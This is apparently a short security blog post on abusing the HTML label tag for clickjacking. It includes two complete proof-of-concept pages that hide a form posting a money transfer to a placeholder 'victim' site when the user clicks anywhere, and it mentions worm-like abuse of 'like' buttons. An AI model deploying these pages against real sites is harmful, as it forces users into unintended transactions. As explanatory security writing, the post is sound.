Another niche attack. I happened to notice the interesting behaviour of
the <label> tag today while working on some web application development.
<label for="target">_STUFF_</label>The for-attribute triggers a click event on the targeted element by id. It can trigger the click events on a bunch of different input-tags whenever anything between it’s start and end tags are clicked. This is an intended behaviour, but it can be abused for clickjacking.
Here is a way to abuse it for submitting csrf forms.
<!doctype html>
<html>
<body>
<label
for="target_element"
style="display: block; height: 13370px; width: 100%;"
>
</label>
<form method="post" action="http://victim" style="display: none;">
<input type="text" name="moneys" value="all" />
<input type="text" name="recipient" value="evul_haxxer" />
<input
id="target_element"
type="submit"
name="send"
value="Send moneys"
/>
</form>
</body>
</html>Of course, it’s a bit redundant. The following snippet does the same thing without using the label tag at all.
<!doctype html>
<html>
<body>
<form method="post" action="http://victim">
<input
id="target_element"
type="submit"
name="send"
value="Send moneys"
style="display: block; height: 13370px; width: 100%; opacity: 0;"
/>
<input type="text" name="moneys" value="all" />
<input type="text" name="recipient" value="evul_haxxer" />
</form>
</body>
</html>I tested both of these in firefox with noscript and they pass.
But imagine a scenario where the HTML filtering is not quite as secure as it should be and the label-tag can be submitted. Then it could be abused to trigger clicks on the rendered site without the user’s consent. Imagine a social media site with a “like”-functionality alá Facebook for example. Triggering a click on the like could make for some fun Samy-like worms.
Fortunately, most sites use whitelists for html user input these days.